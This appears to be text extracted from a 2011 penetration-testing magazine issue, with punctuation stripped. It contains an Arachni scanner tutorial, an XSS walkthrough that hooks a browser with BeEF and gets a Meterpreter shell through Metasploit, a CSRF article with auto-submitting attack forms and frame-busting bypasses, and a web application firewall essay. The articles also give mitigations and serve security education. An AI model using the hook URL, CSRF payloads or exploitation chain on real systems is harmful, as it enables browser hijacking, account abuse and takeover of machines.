bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
